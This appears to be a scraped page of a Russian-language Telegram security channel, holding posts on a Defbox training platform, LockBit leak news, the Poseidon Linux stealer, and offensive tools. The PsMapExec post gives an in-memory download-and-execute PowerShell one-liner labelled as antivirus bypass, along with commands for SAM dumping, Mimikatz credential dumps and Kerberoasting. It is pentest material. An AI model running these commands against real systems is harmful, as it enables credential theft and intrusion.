Fsecurity | HH
前往频道在 Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
显示更多2 010
订阅者
-124 小时
+27 天
-1230 天
帖子存档
2 008
Сегодня попробовал такую площадку, как Defbox, спросите, что это? 🤔
Defbox — это платформа, которая помогает тестировать и совершенствовать практические навыки кибербезопасности.
Менеджеры SOC
Для разработки и тестирования правил корреляции аналитикам необходимо развернуть тестовую инфраструктуру. Defbox экономит время аналитиков - тестовая инфраструктура в Defbox развертывается и взламывается в один клик - нет необходимости развертывать и обслуживать испытательные стен.
Профессоров
Обучайте своих студентов реальным кибератакам на реальную инфраструктуру. Студенты получат прочные практические навыки, используя реальные инструменты для защиты живой систем
Любым пользователям
Посмотрите, как выглядит кибератака в режиме реального времени. Станьте киберзащитником, который защищает активы от киберугроз.
Моя первая попытка стала проигрышной, но я успел посмотреть, какой пользователь был атакован!👾
Попробуй себя как защитник🛡 и почувствуй боль XD
2 008
Repost from НеКасперский
Воздух
Переговоры властей США и LockBit дальше смешного предложения в $50 тыс. не продвинулись и группировка всё-таки опубликовала украденные данные.
Вот только открытом доступе оказались совсем не данные Центрального Банка Америки, а Evolve Bank & Trust — небольшого банка из Арканзаса. Хакеры разместили ссылки на внутренние документы скромной финансовой организации и на этом всё. В банке, кстати, подтвердили утечку, и заявили, что её локализовали и вообще всё уже ок.
Зачем LockBit было так преувеличивать свои достижения — не ясно. ПО всей видимости, очень уж хотелось хоть как-то ответить на захват своей инфраструктуры силами ФБР США.
НеКасперский
2 008
Repost from Kali Linux
💻 RedTiger — мультитул с массой функций для пентеста и взлома
Позволяет проводить реализовывать разные атаки, типо SQL-инъекций, извлекать информацию по email и т.д.
Исключительно в этичных целях
🖥 GitHub
@linuxkalii
2 008
Repost from Pentest HaT
🔄 💻 PsMapExec v0.6.2
Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell.
UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF
Текущая поддержка методов (протоколов):
🔵RDP
🔵SessionHunter
🔵SMB
🔵SMB Signing
🔵Spraying
🔵VNC
🔵WinRM
🔵WMI
🔵MSSQL
🔵Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов
🔵 ConsoleHistory - история в PowerShell
🔵 Files - файлы в типичных директориях
🔵 KerbDump - дамп Kerberos билетов
🔵 eKeys - дамп ключей (Mimikatz)
🔵 LogonPasswords - дамп logon passwords (Mimikatz)
🔵 LSA - дамп LSA (Mimikatz)
🔵 NTDS - реализация DCsync
🔵 SAM - дамп SAM
Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
💻 Github
▪️ Documentation
#soft #pentest #powershell #psmapexec #activedirectory #windows
✈️ // Pentest HaT 🎩2 008
Обновил Obsidian-Pentest
Коммит с изменениями -> [ссылка]
Смотрите на дату если не хотите смотреть коммит
Приятного чтения 👾📖
2 008
Repost from Kali Linux
💻 Poseidon — стилер от APT-C-56
Хакерская группировка APT-C-56, также известная как Transparent Tribe, ProjectM и C-Major, вновь активизировала свою деятельность, на этот раз с использованием атак на Linux-системы.
Базирующаяся в Южной Азии группа киберпреступников обычно сосредотачивает свои усилия на странах данного региона, в том числе часто атакуя Индию. APT-C-56 известна своими сложными методами фишинговых атак и мультиплатформенными вредоносными программами, включая знаменитый троян CrimsonRAT для Windows.
Недавно специалисты из 360 Advanced Threat Research Institute зафиксировали атаку, в ходе которой APT-C-56 использовала файлы Linux c расширением
.desktop для распространения вредоносного ПО. Вредоносная программа, получившая название Poseidon, является инфостилером и предназначена для кражи данных. Метод атаки с Linux-ярлыками ранее применялся довольно редко, что делает его особенно опасным.
Для осуществления атаки группа создала архивный файл, содержащий desktop-файл, который в Linux-системах выполняет роль ярлыка. Пользователь, запускающий этот файл, активирует цепочку событий: загружается и открывается поддельный документ, одновременно скачиваются и запускаются вредоносные ELF-файлы. Затем Poseidon, написанный на Go, устанавливает постоянное присутствие в системе для сбора конфиденциальной информации.
Архивный файл, рассмотренный исследователями, имел название Agenda_of_Meeting.zip и содержал desktop-файл approved_copy.desktop. Этот файл использует символы # для увеличения размера и обхода антивирусных систем. После удаления этих символов становится виден скрипт, который скачивает и открывает PDF-документ, а затем создаёт скрытые директории и запускает вредоносные программы. Одна из программ выполняет функции сбора данных и отправки их на сервер злоумышленников.
Исследование показало, что Poseidon способен выполнять множество задач: фиксировать нажатия клавиш, загружать и скачивать файлы, сканировать порты, делать скриншоты, исполнять команды и осуществлять удалённое управление. Эти функции делают его мощным инструментом для шпионажа.
🗄 Подробнее
@linuxkalii2 008
Repost from Pentest HaT
🔄😉 BloodHound CE v5.11.0
Инструмент для выявления связей и построения графов в active directory. Достаточно одной учетной записи доменного пользователя.
Необходимая вещь при пентесте 🏠 Windows среды.
Для сбора информации используется скрипт bloodhound.py или SharpHound
Установка:
curl -L https://ghst.ly/getbhce | docker compose -f - up
http://localhost:8080/ui/login
Логин admin и сгенерированный пароль
Сбор информации:
python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp
В 💻 Kali устанавливается одной командой:
sudo apt install bloodhound.py
💻 Download
🔠 Docs
#bloodhound #pentest #active_directory #soft
✈️ // Pentest HaT 🎩
现已上线!2025 年 Telegram 研究 — 年度关键洞察 
